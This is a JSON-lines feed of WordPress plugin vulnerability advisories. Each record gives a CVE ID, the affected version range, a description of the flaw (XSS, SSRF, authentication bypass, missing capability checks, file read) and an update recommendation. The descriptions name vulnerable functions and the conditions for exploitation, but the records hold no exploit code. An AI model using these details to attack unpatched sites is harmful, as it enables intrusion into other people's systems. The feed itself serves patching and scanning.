{"CVE_ID":"CVE-2024-12767","slug":"buddyboss-platform","versionEndExcluding":"2.7.60","description":"The buddyboss-platform WordPress plugin before 2.7.60 lacks proper access controls and allows a logged-in user to view comments on private posts","recommendation":"Update to version 2.7.60, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e8997f90-d8e9-4815-8808-aa0183443dae\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e8997f90-d8e9-4815-8808-aa0183443dae\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7503","slug":"woo-social-login","versionImpact":"2.7.5","versionEndExcluding":"2.7.6","description":"The WooCommerce - Social Login plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.7.5. This is due to the use of loose comparison of the activation code in the 'woo_slg_confirm_email_user' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the userID. This requires the email module to be enabled.","recommendation":"Update to version 2.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3b727ba-b39c-4a98-a6a6-ea33785079f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3b727ba-b39c-4a98-a6a6-ea33785079f6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8724","slug":"waitlist-woocommerce","versionImpact":"2.7.5","versionEndExcluding":"2.7.6","description":"The Waitlist Woocommerce ( Back in stock notifier ) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.7.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c298c87e-cf3c-4b72-bb0e-a01ca2dfe52f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c298c87e-cf3c-4b72-bb0e-a01ca2dfe52f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waitlist-woocommerce\\\/trunk\\\/admin\\\/templates\\\/xoo-wl-import-form.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/waitlist-woocommerce\\\/trunk\\\/admin\\\/templates\\\/xoo-wl-import-form.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3151186%40waitlist-woocommerce&new=3151186%40waitlist-woocommerce&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3151186%40waitlist-woocommerce&new=3151186%40waitlist-woocommerce&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1043","slug":"embed-any-document","versionImpact":"2.7.5","versionEndExcluding":"2.7.6","description":"The Embed Any Document \u2013 Embed PDF, Word, PowerPoint and Excel Files plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.7.5 via the 'embeddoc' shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","recommendation":"Update to version 2.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242370\\\/embed-any-document\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242370\\\/embed-any-document\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9f8c600-d62d-4f27-ba73-1a77a63859bc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b9f8c600-d62d-4f27-ba73-1a77a63859bc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5359","slug":"w3-total-cache","versionImpact":"2.7.5","versionEndExcluding":"2.7.6","description":"The W3 Total Cache plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 2.7.5 via Google OAuth API secrets stored in plaintext in the publicly visible plugin source. This can allow unauthenticated attackers to impersonate W3 Total Cache and gain access to user account information in successful conditions. This would not impact the WordPress user's site in any way.","recommendation":"Update to version 2.7.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d89a534-978e-4fd8-be3a-5137bdc22dc9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2d89a534-978e-4fd8-be3a-5137bdc22dc9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/trunk\\\/PageSpeed_Api.php#L39\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/w3-total-cache\\\/trunk\\\/PageSpeed_Api.php#L39\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156426\\\/w3-total-cache\\\/tags\\\/2.7.6\\\/PageSpeed_Api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156426\\\/w3-total-cache\\\/tags\\\/2.7.6\\\/PageSpeed_Api.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4652","slug":"video-background","versionEndExcluding":"2.7.5","description":"The Video Background WordPress plugin before 2.7.5 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ebf3df99-6939-4ae9-ad55-004f33c1cfbc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ebf3df99-6939-4ae9-ad55-004f33c1cfbc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13697","slug":"bp-better-messages","versionImpact":"2.7.4","versionEndExcluding":"2.7.5","description":"The Better Messages \u2013 Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.7.4 via the 'nice_links'. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services. Successful exploitation requires the \"Enable link previews\" to be enabled (default).","recommendation":"Update to version 2.7.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243180\\\/bp-better-messages\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3243180\\\/bp-better-messages\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b67710d7-976b-4a65-bad3-091a97aceb00?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b67710d7-976b-4a65-bad3-091a97aceb00?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2701","slug":"gravityforms","versionEndExcluding":"2.7.5","description":"The Gravity Forms WordPress plugin before 2.7.5 does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting which could be used against high-privileged users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/298fbe34-62c2-4e56-9bdb-90da570c5bbe\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/298fbe34-62c2-4e56-9bdb-90da570c5bbe\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2919","slug":"tutor","versionImpact":"2.7.4","versionEndExcluding":"2.7.5","description":"The Tutor LMS plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.7.4. This is due to missing or incorrect nonce validation on the 'addon_enable_disable' function. This makes it possible for unauthenticated attackers to enable or disable addons via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.7.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/992abd72-2a8e-4bda-94c2-4a7f88487906?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/992abd72-2a8e-4bda-94c2-4a7f88487906?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148621\\\/tutor\\\/tags\\\/2.7.5\\\/classes\\\/Ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3148621\\\/tutor\\\/tags\\\/2.7.5\\\/classes\\\/Ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/trunk\\\/classes\\\/Ajax.php?rev=3128650#L506\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor\\\/trunk\\\/classes\\\/Ajax.php?rev=3128650#L506\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13702","slug":"crm-customer-relationship-management-by-vcita","versionImpact":"2.7.4","versionEndExcluding":"2.7.5","description":"The CRM and Lead Management by vcita plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'vCitaMeetingScheduler' and 'vCitaSchedulingCalendar' shortcodes in all versions up to, and including, 2.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3256449%40crm-customer-relationship-management-by-vcita&new=3256449%40crm-customer-relationship-management-by-vcita&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3256449%40crm-customer-relationship-management-by-vcita&new=3256449%40crm-customer-relationship-management-by-vcita&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e5d3239b-0f65-46f7-977b-9995542a6eb9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e5d3239b-0f65-46f7-977b-9995542a6eb9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10312","slug":"exclusive-addons-for-elementor","versionImpact":"2.7.4","versionEndExcluding":"2.7.5","description":"The Exclusive Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.7.4 via the render function in elements\/tabs\/tabs.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 2.7.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc931943-13f3-4ab1-b70f-c234253ca269?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc931943-13f3-4ab1-b70f-c234253ca269?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175285\\\/exclusive-addons-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3175285\\\/exclusive-addons-for-elementor\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8658","slug":"mycred","versionImpact":"2.7.3","versionEndExcluding":"2.7.4","description":"The myCred \u2013 Loyalty Points and Rewards plugin for WordPress and WooCommerce \u2013 Give Points, Ranks, Badges, Cashback, WooCommerce rewards, and WooCommerce credits for Gamification plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the mycred_update_database() function in all versions up to, and including, 2.7.3. This makes it possible for unauthenticated attackers to upgrade an out of date database.","recommendation":"Update to version 2.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20be9a37-9e9f-4791-a27c-e0db007be787?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20be9a37-9e9f-4791-a27c-e0db007be787?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156989\\\/mycred\\\/trunk\\\/includes\\\/mycred-database-upgrade.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156989\\\/mycred\\\/trunk\\\/includes\\\/mycred-database-upgrade.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9345","slug":"product-delivery-date-for-woocommerce-lite","versionImpact":"2.7.3","versionEndExcluding":"2.7.4","description":"The Product Delivery Date for WooCommerce \u2013 Lite plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.7.3. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This is only exploitable when notices are present.","recommendation":"Update to version 2.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1127a5f3-1698-45e9-85bd-4eebfdbe56d4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1127a5f3-1698-45e9-85bd-4eebfdbe56d4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-delivery-date-for-woocommerce-lite\\\/tags\\\/-2.7.3\\\/includes\\\/component\\\/pro-notices-in-lite\\\/ts-pro-notices.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-delivery-date-for-woocommerce-lite\\\/tags\\\/-2.7.3\\\/includes\\\/component\\\/pro-notices-in-lite\\\/ts-pro-notices.php#L102\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161353\\\/product-delivery-date-for-woocommerce-lite\\\/tags\\\/2.7.4\\\/includes\\\/component\\\/pro-notices-in-lite\\\/ts-pro-notices.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3161353\\\/product-delivery-date-for-woocommerce-lite\\\/tags\\\/2.7.4\\\/includes\\\/component\\\/pro-notices-in-lite\\\/ts-pro-notices.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0820","slug":"job-postings","versionImpact":"2.7.3","versionEndExcluding":"2.7.4","description":"The Jobs for WordPress plugin before 2.7.4 does not sanitise and escape some parameters, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks","recommendation":"Update to version 2.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc091bbd-7338-4bd4-add5-e46502a9a949\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fc091bbd-7338-4bd4-add5-e46502a9a949\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6637","slug":"woo-social-login","versionImpact":"2.7.3","versionEndExcluding":"2.7.4","description":"The WooCommerce - Social Login plugin for WordPress is vulnerable to unauthenticated privilege escalation in all versions up to, and including, 2.7.3. This is due to a lack of brute force controls on a weak one-time password. This makes it possible for unauthenticated attackers to brute force the one-time password for any user, except an Administrator, if they know the email of the user.","recommendation":"Update to version 2.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10d92d5e-1c23-4f6a-bfab-0756876190a5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/10d92d5e-1c23-4f6a-bfab-0756876190a5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6636","slug":"woo-social-login","versionImpact":"2.7.3","versionEndExcluding":"2.7.4","description":"The WooCommerce - Social Login plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'woo_slg_login_email' function in all versions up to, and including, 2.7.3. This makes it possible for unauthenticated attackers to change the default role to Administrator while registering for an account.","recommendation":"Update to version 2.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77ea4ba8-6c13-494a-92e3-12643003635b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77ea4ba8-6c13-494a-92e3-12643003635b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6635","slug":"woo-social-login","versionImpact":"2.7.3","versionEndExcluding":"2.7.4","description":"The WooCommerce - Social Login plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.7.3. This is due to insufficient controls in the 'woo_slg_login_email' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, excluding an administrator, if they know the email of the user.","recommendation":"Update to version 2.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37836722-eb25-4393-8cdf-91057642ba3f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37836722-eb25-4393-8cdf-91057642ba3f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/social-login-wordpress-woocommerce-plugin\\\/8495883\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4280","slug":"white-label-cms","versionImpact":"2.7.3","versionEndExcluding":"2.7.4","description":"The White Label CMS plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the reset_plugin function in all versions up to, and including, 2.7.3. This makes it possible for unauthenticated attackers to reset plugin settings.","recommendation":"Update to version 2.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13a206ea-0890-4535-9da7-54a7a45f0452?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13a206ea-0890-4535-9da7-54a7a45f0452?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082887\\\/white-label-cms\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3082887\\\/white-label-cms\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13314","slug":"wp-carousel-free","versionImpact":"2.7.3","versionEndExcluding":"2.7.4","description":"The Carousel, Slider, Gallery by WP Carousel WordPress plugin before 2.7.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 2.7.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ae234bbe-a4af-49f5-8e0a-4fb960821e05\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/ae234bbe-a4af-49f5-8e0a-4fb960821e05\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-5537","slug":"foobox-image-lightbox","versionImpact":"2.7.34","versionEndExcluding":"2.7.35","description":"The Lightbox & Modal Popup WordPress Plugin \u2013 FooBox plugin for WordPress is vulnerable to Stored Cross-Site Scripting via image alternative texts in all versions up to, and including, 2.7.34 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.35, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3322273%40foobox-image-lightbox&new=3322273%40foobox-image-lightbox&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3322273%40foobox-image-lightbox&new=3322273%40foobox-image-lightbox&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5fd2163-b8ef-4dd1-a12b-cd9187145134?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5fd2163-b8ef-4dd1-a12b-cd9187145134?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5668","slug":"foobox-image-lightbox","versionImpact":"2.7.28","versionEndExcluding":"2.7.32","description":"The Lightbox & Modal Popup WordPress Plugin \u2013 FooBox plugin for WordPress is vulnerable to DOM-based Stored Cross-Site Scripting via HTML data attributes in all versions up to, and including, 2.7.28 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.7.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/923f9e66-2e26-4ec2-a4b3-439881a6ca10?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/923f9e66-2e26-4ec2-a4b3-439881a6ca10?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3130678\\\/foobox-image-lightbox\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3130678\\\/foobox-image-lightbox\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4645","slug":"ad-inserter","versionImpact":"2.7.30","versionEndExcluding":"2.7.31","description":"The Ad Inserter for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 2.7.30 via the ai_ajax function. This can allow unauthenticated attackers to extract sensitive data such as post titles and slugs (including those of protected posts along with their passwords), usernames, available roles, and the plugin license key, provided the remote debugging option is enabled. In the default state it is disabled.","recommendation":"Update to version 2.7.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57b3eef3-e165-45ac-89d7-2a2a6529b310?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57b3eef3-e165-45ac-89d7-2a2a6529b310?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ad-inserter\\\/trunk\\\/ad-inserter.php#L6529\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ad-inserter\\\/trunk\\\/ad-inserter.php#L6529\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2969942%40ad-inserter%2Ftags%2F2.7.31&old=2922718%40ad-inserter%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2969942%40ad-inserter%2Ftags%2F2.7.31&old=2922718%40ad-inserter%2Ftrunk\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4668","slug":"ad-inserter","versionImpact":"2.7.30","versionEndExcluding":"2.7.31","description":"The Ad Inserter for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 2.7.30 via the ai-debug-processing-fe URL parameter. This can allow unauthenticated attackers to extract sensitive data including installed plugins (present and active), active theme, various plugin settings, WordPress version, as well as some server settings such as memory limit and installation paths.","recommendation":"Update to version 2.7.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce457c98-c55b-4b71-a80b-393eceb9effd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ce457c98-c55b-4b71-a80b-393eceb9effd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2969942%40ad-inserter%2Ftags%2F2.7.31&old=2922718%40ad-inserter%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2969942%40ad-inserter%2Ftags%2F2.7.31&old=2922718%40ad-inserter%2Ftrunk\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5784","slug":"tutor-pro","versionImpact":"2.7.2","versionEndExcluding":"2.7.3","description":"The Tutor LMS Pro plugin for WordPress is vulnerable to unauthorized administrative actions execution due to missing capability checks on multiple functions like treport_quiz_atttempt_delete and tutor_gc_class_action in all versions up to, and including, 2.7.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform administrative actions on the site, like comments, posts or users deletion, viewing notifications, etc.","recommendation":"Update to version 2.7.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa5c23ed-7239-40e1-a795-1ae8d4c2d6c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aa5c23ed-7239-40e1-a795-1ae8d4c2d6c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/tutorlms.com\\\/releases\\\/id\\\/299\\\/\",\"name\":\"https:\\\/\\\/tutorlms.com\\\/releases\\\/id\\\/299\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3897","slug":"eucookielaw","versionImpact":"2.7.2","versionEndExcluding":"2.7.3","description":"The EUCookieLaw plugin for WordPress is vulnerable to Arbitrary File Read in all versions up to, and including, 2.7.2 via the 'file_get_contents' function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. The vulnerability can only be exploited if a caching plugin such as W3 Total Cache is installed and activated.","recommendation":"Update to version 2.7.3, or a newer patched 